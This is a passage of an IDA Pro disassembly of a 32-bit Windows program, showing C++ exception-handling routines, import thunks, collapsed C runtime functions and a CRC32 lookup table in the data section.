pop ebp
retn 4
sub_43A870 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A8A0 proc near ; CODE XREF: sub_43A870+E�p
; sub_43AA20+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43A8A0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
mov [ebp+var_14], ecx
mov [ebp+var_10], offset dword_43CF7C
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_14]
call ??0exception@@QAE@ABQBD@Z ; exception::exception(char const * const &)
mov [ebp+var_4], 0
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_14]
add ecx, 0Ch
call sub_40DCEB
mov edx, [ebp+var_14]
mov dword ptr [edx], offset off_43E110
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_14]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_43A8A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A910 proc near ; CODE XREF: sub_43A960+A�p
; DATA XREF: .rdata:0043E464�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_43E120
mov ecx, [ebp+var_4]
call sub_43A7E0
mov esp, ebp
pop ebp
retn
sub_43A910 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A930 proc near ; DATA XREF: .rdata:0043E128�o
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_20], ecx
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_1C]
call sub_43A990
push offset dword_43E460
lea ecx, [ebp+var_1C]
push ecx
call __CxxThrowException@8 ; _CxxThrowException(x,x)
mov esp, ebp
pop ebp
retn
sub_43A930 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A960 proc near ; DATA XREF: .rdata:off_43E120�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_43A910
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_43A985
mov ecx, [ebp+var_4]
push ecx ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
add esp, 4
loc_43A985: ; CODE XREF: sub_43A960+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43A960 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A990 proc near ; CODE XREF: sub_43A930+10�p
; DATA XREF: .rdata:0043E448�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43A720
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43E120
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43A990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A9C0 proc near ; CODE XREF: sub_40DE66+17�p
; sub_40E0E5+E�p
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43A9C0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
lea eax, [ebp+var_3C]
push eax
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp+var_38]
call sub_40DD15
mov [ebp+var_4], 0
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_28]
call sub_43AA20
push offset dword_43E560
lea edx, [ebp+var_28]
push edx
call __CxxThrowException@8 ; _CxxThrowException(x,x)
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_43A9C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AA20 proc near ; CODE XREF: sub_43A9C0+3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43A8A0
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43E148
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43AA20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AA50 proc near ; CODE XREF: sub_43AAA0+A�p
; DATA XREF: .rdata:0043E564�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_43E148
mov ecx, [ebp+var_4]
call sub_43A7E0
mov esp, ebp
pop ebp
retn
sub_43AA50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AA70 proc near ; DATA XREF: .rdata:0043E150�o
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_20], ecx
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_1C]
call sub_43AAD0
push offset dword_43E560
lea ecx, [ebp+var_1C]
push ecx
call __CxxThrowException@8 ; _CxxThrowException(x,x)
mov esp, ebp
pop ebp
retn
sub_43AA70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AAA0 proc near ; DATA XREF: .rdata:off_43E148�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_43AA50
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_43AAC5
mov ecx, [ebp+var_4]
push ecx ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
add esp, 4
loc_43AAC5: ; CODE XREF: sub_43AAA0+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43AAA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AAD0 proc near ; CODE XREF: sub_43AA70+10�p
; DATA XREF: .rdata:0043E548�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43A720
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43E148
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43AAD0 endp
; ---------------------------------------------------------------------------
align 10h
; [00000019 BYTES: COLLAPSED FUNCTION unknown_libname_35. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AB20 proc near ; CODE XREF: unknown_libname_35+8�p
push ebp
mov ebp, esp
push offset nullsub_1 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_43AB20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AB40 proc near ; CODE XREF: unknown_libname_35+D�p
push ebp
mov ebp, esp
xor eax, eax
mov al, byte_4F4C3C
and eax, 1
test eax, eax
jnz short loc_43AB60
mov cl, byte_4F4C3C
or cl, 1
mov byte_4F4C3C, cl
loc_43AB60: ; CODE XREF: sub_43AB40+F�j
pop ebp
retn
sub_43AB40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AB70 proc near ; CODE XREF: unknown_libname_35+12�p
push ebp
mov ebp, esp
push offset __initp_misc_winxfltr_0 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_43AB70 endp
; ---------------------------------------------------------------------------
align 10h
; [00000005 BYTES: COLLAPSED FUNCTION __initp_misc_winxfltr_0. PRESS KEYPAD "+" TO EXPAND]
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43AB96 proc near ; CODE XREF: sub_40E3C7+6F�p
jmp ds:dword_4F54F4
sub_43AB96 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4F554C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43ABA2 proc near ; CODE XREF: sub_40D69B+5E�p
; sub_40F402+14A�p ...
jmp ds:dword_4F5548
sub_43ABA2 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4F5544
; ---------------------------------------------------------------------------
jmp ds:dword_4F5540
; ---------------------------------------------------------------------------
jmp ds:dword_4F553C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5538
; ---------------------------------------------------------------------------
jmp ds:dword_4F5534
; ---------------------------------------------------------------------------
jmp ds:dword_4F5530
; ---------------------------------------------------------------------------
jmp ds:dword_4F552C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5528
; ---------------------------------------------------------------------------
jmp ds:dword_4F5550
; ---------------------------------------------------------------------------
jmp ds:dword_4F5520
; ---------------------------------------------------------------------------
jmp ds:dword_4F551C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5518
; ---------------------------------------------------------------------------
jmp ds:dword_4F5514
; ---------------------------------------------------------------------------
jmp ds:dword_4F5510
; ---------------------------------------------------------------------------
jmp ds:dword_4F550C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5508
; ---------------------------------------------------------------------------
jmp ds:dword_4F5504
; ---------------------------------------------------------------------------
jmp ds:dword_4F5500
; ---------------------------------------------------------------------------
jmp ds:dword_4F54FC
; ---------------------------------------------------------------------------
jmp ds:dword_4F5524
; ---------------------------------------------------------------------------
jmp ds:dword_4F5338
; ---------------------------------------------------------------------------
jmp ds:dword_4F533C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5340
; ---------------------------------------------------------------------------
jmp ds:dword_4F5344
; ---------------------------------------------------------------------------
jmp ds:dword_4F5348
; ---------------------------------------------------------------------------
jmp ds:dword_4F534C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5350
; ---------------------------------------------------------------------------
jmp ds:dword_4F5354
; ---------------------------------------------------------------------------
jmp ds:dword_4F5358
; ---------------------------------------------------------------------------
jmp ds:dword_4F535C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5360
; ---------------------------------------------------------------------------
jmp ds:dword_4F5364
; ---------------------------------------------------------------------------
jmp ds:dword_4F5368
; ---------------------------------------------------------------------------
jmp ds:dword_4F536C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5370
; ---------------------------------------------------------------------------
jmp ds:dword_4F5374
; ---------------------------------------------------------------------------
jmp ds:dword_4F5378
; ---------------------------------------------------------------------------
jmp ds:dword_4F537C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5380
; ---------------------------------------------------------------------------
jmp ds:dword_4F5384
; ---------------------------------------------------------------------------
jmp ds:dword_4F5388
; ---------------------------------------------------------------------------
jmp ds:dword_4F538C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5390
; ---------------------------------------------------------------------------
jmp ds:dword_4F5394
; ---------------------------------------------------------------------------
jmp ds:dword_4F5398
; ---------------------------------------------------------------------------
jmp ds:dword_4F539C
; ---------------------------------------------------------------------------
jmp ds:dword_4F53A0
; ---------------------------------------------------------------------------
jmp ds:dword_4F53A4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53A8
; ---------------------------------------------------------------------------
jmp ds:dword_4F53AC
; ---------------------------------------------------------------------------
jmp ds:dword_4F53B0
; ---------------------------------------------------------------------------
jmp ds:dword_4F53B4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53B8
; ---------------------------------------------------------------------------
jmp ds:dword_4F53BC
; ---------------------------------------------------------------------------
jmp ds:dword_4F53C0
; ---------------------------------------------------------------------------
jmp ds:dword_4F53C4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53C8
; ---------------------------------------------------------------------------
jmp ds:dword_4F53CC
; ---------------------------------------------------------------------------
jmp ds:dword_4F53D0
; ---------------------------------------------------------------------------
jmp ds:dword_4F53D4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53D8
; ---------------------------------------------------------------------------
jmp ds:dword_4F53DC
; ---------------------------------------------------------------------------
jmp ds:dword_4F53E0
; ---------------------------------------------------------------------------
jmp ds:dword_4F53E4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53E8
; ---------------------------------------------------------------------------
jmp ds:dword_4F53EC
; ---------------------------------------------------------------------------
jmp ds:dword_4F53F0
; ---------------------------------------------------------------------------
jmp ds:dword_4F53F4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53F8
; ---------------------------------------------------------------------------
jmp ds:dword_4F53FC
; ---------------------------------------------------------------------------
jmp ds:dword_4F5400
; ---------------------------------------------------------------------------
jmp ds:dword_4F5404
; ---------------------------------------------------------------------------
jmp ds:dword_4F5408
; ---------------------------------------------------------------------------
jmp ds:dword_4F540C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5410
; ---------------------------------------------------------------------------
jmp ds:dword_4F52D4
; ---------------------------------------------------------------------------
jmp ds:dword_4F5414
; ---------------------------------------------------------------------------
jmp ds:dword_4F5418
; ---------------------------------------------------------------------------
jmp ds:dword_4F541C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5420
; ---------------------------------------------------------------------------
jmp ds:dword_4F5424
; ---------------------------------------------------------------------------
jmp ds:dword_4F5428
; ---------------------------------------------------------------------------
jmp ds:dword_4F542C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5430
; ---------------------------------------------------------------------------
jmp ds:dword_4F5434
; ---------------------------------------------------------------------------
jmp ds:dword_4F5438
; ---------------------------------------------------------------------------
jmp ds:dword_4F543C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5440
; ---------------------------------------------------------------------------
jmp ds:dword_4F5444
; ---------------------------------------------------------------------------
jmp ds:dword_4F5448
; ---------------------------------------------------------------------------
jmp ds:dword_4F544C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5450
; ---------------------------------------------------------------------------
jmp ds:dword_4F5454
; ---------------------------------------------------------------------------
jmp ds:dword_4F5458
; ---------------------------------------------------------------------------
jmp ds:dword_4F545C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5460
; ---------------------------------------------------------------------------
jmp ds:dword_4F5464
; ---------------------------------------------------------------------------
jmp ds:dword_4F5468
; ---------------------------------------------------------------------------
jmp ds:dword_4F546C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5470
; ---------------------------------------------------------------------------
jmp ds:dword_4F5474
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43AE06 proc near ; CODE XREF: _UnwindNestedFrames(EHRegistrationNode *,EHExceptionRecord *)+27�p
; __global_unwind2+13�p
jmp ds:dword_4F5478
sub_43AE06 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4F547C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5480
; ---------------------------------------------------------------------------
jmp ds:dword_4F5484
; ---------------------------------------------------------------------------
jmp ds:dword_4F5488
; ---------------------------------------------------------------------------
jmp ds:dword_4F548C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5490
; ---------------------------------------------------------------------------
jmp ds:dword_4F5494
; ---------------------------------------------------------------------------
jmp ds:dword_4F5498
; ---------------------------------------------------------------------------
jmp ds:dword_4F549C
; ---------------------------------------------------------------------------
jmp ds:dword_4F54A0
; ---------------------------------------------------------------------------
jmp ds:dword_4F54A4
; ---------------------------------------------------------------------------
jmp ds:dword_4F54A8
; ---------------------------------------------------------------------------
jmp ds:dword_4F54AC
; ---------------------------------------------------------------------------
jmp ds:dword_4F54B0
; ---------------------------------------------------------------------------
jmp ds:dword_4F54B4
; ---------------------------------------------------------------------------
jmp ds:dword_4F54B8
; ---------------------------------------------------------------------------
jmp ds:dword_4F54BC
; ---------------------------------------------------------------------------
jmp ds:dword_4F54C0
; ---------------------------------------------------------------------------
jmp ds:dword_4F54C4
; ---------------------------------------------------------------------------
jmp ds:dword_4F54C8
; ---------------------------------------------------------------------------
jmp ds:dword_4F54CC
; ---------------------------------------------------------------------------
jmp ds:dword_4F54D0
; ---------------------------------------------------------------------------
jmp ds:dword_4F54D4
; ---------------------------------------------------------------------------
jmp ds:dword_4F54D8
; ---------------------------------------------------------------------------
jmp ds:dword_4F54DC
; ---------------------------------------------------------------------------
jmp ds:dword_4F54E0
; ---------------------------------------------------------------------------
jmp ds:dword_4F54E4
; ---------------------------------------------------------------------------
jmp ds:dword_4F54E8
; ---------------------------------------------------------------------------
jmp ds:dword_4F54EC
; ---------------------------------------------------------------------------
jmp ds:dword_4F5334
; ---------------------------------------------------------------------------
jmp ds:dword_4F5330
; ---------------------------------------------------------------------------
jmp ds:dword_4F532C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5328
; ---------------------------------------------------------------------------
jmp ds:dword_4F5324
; ---------------------------------------------------------------------------
jmp ds:dword_4F5320
; ---------------------------------------------------------------------------
jmp ds:dword_4F531C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5318
; ---------------------------------------------------------------------------
jmp ds:dword_4F5314
; ---------------------------------------------------------------------------
jmp ds:dword_4F5310
; ---------------------------------------------------------------------------
jmp ds:dword_4F530C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5308
; ---------------------------------------------------------------------------
jmp ds:dword_4F5304
; ---------------------------------------------------------------------------
jmp ds:dword_4F5300
; ---------------------------------------------------------------------------
jmp ds:dword_4F52FC
; ---------------------------------------------------------------------------
jmp ds:dword_4F52F8
; ---------------------------------------------------------------------------
jmp ds:dword_4F52F4
; ---------------------------------------------------------------------------
jmp ds:dword_4F52F0
; ---------------------------------------------------------------------------
jmp ds:dword_4F52EC
; ---------------------------------------------------------------------------
jmp ds:dword_4F52E8
; ---------------------------------------------------------------------------
jmp ds:dword_4F52E4
; ---------------------------------------------------------------------------
jmp ds:dword_4F52E0
; ---------------------------------------------------------------------------
jmp ds:dword_4F52DC
; ---------------------------------------------------------------------------
jmp ds:dword_4F52D8
; ---------------------------------------------------------------------------
align 10h
; [000001A1 BYTES: COLLAPSED FUNCTION __wcsicmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000047 BYTES: COLLAPSED FUNCTION __strdup. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
mov dword ptr [eax], offset off_43E158
mov ecx, [ebp-4]
mov dword ptr [ecx+4], 0
mov edx, [ebp-4]
mov dword ptr [edx+8], 0
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [0000002E BYTES: COLLAPSED FUNCTION exception::`scalar deleting destructor'(uint). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000069 BYTES: COLLAPSED FUNCTION exception::exception(char const * const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000084 BYTES: COLLAPSED FUNCTION exception::exception(exception const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002C BYTES: COLLAPSED FUNCTION exception::operator=(exception const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION exception::~exception(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000021 BYTES: COLLAPSED FUNCTION exception::what(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000040 BYTES: COLLAPSED FUNCTION type_info::~type_info(void). PRESS KEYPAD "+" TO EXPAND]
; [0000002E BYTES: COLLAPSED FUNCTION type_info::`scalar deleting destructor'(uint). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000028 BYTES: COLLAPSED FUNCTION type_info::operator==(type_info const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000029 BYTES: COLLAPSED FUNCTION type_info::operator!=(type_info const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002C BYTES: COLLAPSED FUNCTION type_info::before(type_info const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000011 BYTES: COLLAPSED FUNCTION type_info::raw_name(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000019 BYTES: COLLAPSED FUNCTION type_info::type_info(type_info const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000010 BYTES: COLLAPSED FUNCTION std::_Init_locks::operator=(std::_Init_locks const &). PRESS KEYPAD "+" TO EXPAND]
; [00000041 BYTES: COLLAPSED FUNCTION _CxxThrowException(x,x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000C5 BYTES: COLLAPSED FUNCTION _towlower. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B4 BYTES: COLLAPSED FUNCTION sub_43B5C0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000002E7 BYTES: COLLAPSED FUNCTION ___crtLCMapStringW. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000056 BYTES: COLLAPSED FUNCTION _wcsncnt. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000077 BYTES: COLLAPSED FUNCTION _iswctype. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION _is_wctype. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_43BA70 proc near ; DATA XREF: .rdata:0043E364�o
lea ecx, [ebp-38h]
jmp sub_40DD38
sub_43BA70 endp
; =============== S U B R O U T I N E =======================================
sub_43BA78 proc near ; DATA XREF: .rdata:0043E35C�o
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_43BA8E
mov ecx, [ebp+8]
jmp sub_40DD38
; ---------------------------------------------------------------------------
locret_43BA8E: ; CODE XREF: sub_43BA78+8�j
retn
sub_43BA78 endp
; ---------------------------------------------------------------------------
loc_43BA8F: ; DATA XREF: sub_40D8D7�o
mov eax, offset dword_43E338
jmp ___CxxFrameHandler3
; =============== S U B R O U T I N E =======================================
sub_43BA99 proc near ; DATA XREF: .rdata:0043E38C�o
lea ecx, [ebp+14h]
jmp sub_40DD38
sub_43BA99 endp
; =============== S U B R O U T I N E =======================================
sub_43BAA1 proc near ; DATA XREF: .rdata:0043E394�o
lea ecx, [ebp-1Ch]
jmp sub_40DD38
sub_43BAA1 endp
; ---------------------------------------------------------------------------
loc_43BAA9: ; DATA XREF: sub_40DA4E�o
mov eax, offset dword_43E368
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
align 4
loc_43BAB4: ; DATA XREF: sub_40E175�o
mov eax, offset dword_43E398
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_43BAC0 proc near ; DATA XREF: .rdata:0043E494�o
lea ecx, [ebp-38h]
call sub_40DD38
retn
sub_43BAC0 endp
; =============== S U B R O U T I N E =======================================
SEH_43A6C0 proc near ; DATA XREF: sub_43A6C0+5�o
mov eax, offset dword_43E470
jmp ___CxxFrameHandler3
SEH_43A6C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_43BAE0 proc near ; DATA XREF: .rdata:0043E4BC�o
mov ecx, [ebp-10h]
call ??1exception@@UAE@XZ ; exception::~exception(void)
retn
sub_43BAE0 endp
; =============== S U B R O U T I N E =======================================
SEH_43A720 proc near ; DATA XREF: sub_43A720+5�o
mov eax, offset dword_43E498
jmp ___CxxFrameHandler3
SEH_43A720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_43BB00 proc near ; DATA XREF: .rdata:0043E504�o
mov ecx, [ebp-10h]
call ??1exception@@UAE@XZ ; exception::~exception(void)
retn
sub_43BB00 endp
; =============== S U B R O U T I N E =======================================
SEH_43A7E0 proc near ; DATA XREF: sub_43A7E0+5�o
mov eax, offset dword_43E4E0
jmp ___CxxFrameHandler3
SEH_43A7E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_43BB20 proc near ; DATA XREF: .rdata:0043E52C�o
mov ecx, [ebp-14h]
call ??1exception@@UAE@XZ ; exception::~exception(void)
retn
sub_43BB20 endp
; =============== S U B R O U T I N E =======================================
SEH_43A8A0 proc near ; DATA XREF: sub_43A8A0+5�o
mov eax, offset dword_43E508
jmp ___CxxFrameHandler3
SEH_43A8A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_43BB40 proc near ; DATA XREF: .rdata:0043E594�o
lea ecx, [ebp-38h]
call sub_40DD38
retn
sub_43BB40 endp
; =============== S U B R O U T I N E =======================================
SEH_43A9C0 proc near ; DATA XREF: sub_43A9C0+5�o
mov eax, offset dword_43E570
jmp ___CxxFrameHandler3
SEH_43A9C0 endp
_text ends
; Section 2. (virtual address 0003C000)
; Virtual size : 00002598 ( 9624.)
; Section size in file : 00002598 ( 9624.)
; Offset to raw data for section: 0003C000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 43C000h
dd 0
dd 4683E0FEh, 0
dd 2, 61h, 0
dd 59C00h
dword_43C01C dd 0 ; DATA XREF: sub_401070+26�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
